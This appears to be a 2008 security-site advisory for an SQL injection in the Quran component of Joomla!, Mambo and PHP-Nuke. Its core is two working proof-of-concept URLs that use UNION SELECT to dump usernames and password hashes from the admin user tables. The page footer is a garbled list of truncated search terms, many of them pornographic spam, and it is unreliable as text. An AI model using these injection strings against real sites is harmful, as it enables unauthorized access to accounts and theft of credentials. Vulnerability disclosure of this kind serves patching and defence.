about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla!, Mambo and PHP-Nuke Quran Component SQL Injection Vulnerability


Title Joomla!, Mambo and PHP-Nuke Quran Component SQL Injection Vulnerability
Published 2008-02-15-12:00AM
Updated 2008-02-25-02:42PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Don discovered this vulnerability.
Vulnerable  PHP Nuke Quran 1.1
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available: http://www.example.com/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+mos_users+limit+0,20--http://www.example.com/modules.php?name=Quran&action=viewayat&surano=-9999/**/union/**/select/**/000,pwd,222,333,444/**/from/**/nuke_authors/*where%20admin1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 07 Dec 2009 00:54:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.2d30.c %2Fcompone FTP Server Www.hayfaw www.sexvid www.bjrdtz news for c all cartoo 20812.zip %2Fcompone sexxy show SQL Inject india sexy PHP Advanc Www.mama s 78ab.com 200 /compo bestsex free sex b Vido porno data/vulne www.lhzt.n Sexy+pohto watersex.c &a %2Fadminis %20%20_%20 Invision+P yunhuanfh. %...p?opti bestsex WWW.Bipash www.abdown sex baksta Searching www.chines sex areb SEXY MOVES news for c www.606688 zee music Www.naruto Beet The V myoea CMS is Fre GET /galle qigou123.c www sexy g distccd www.cn7j.c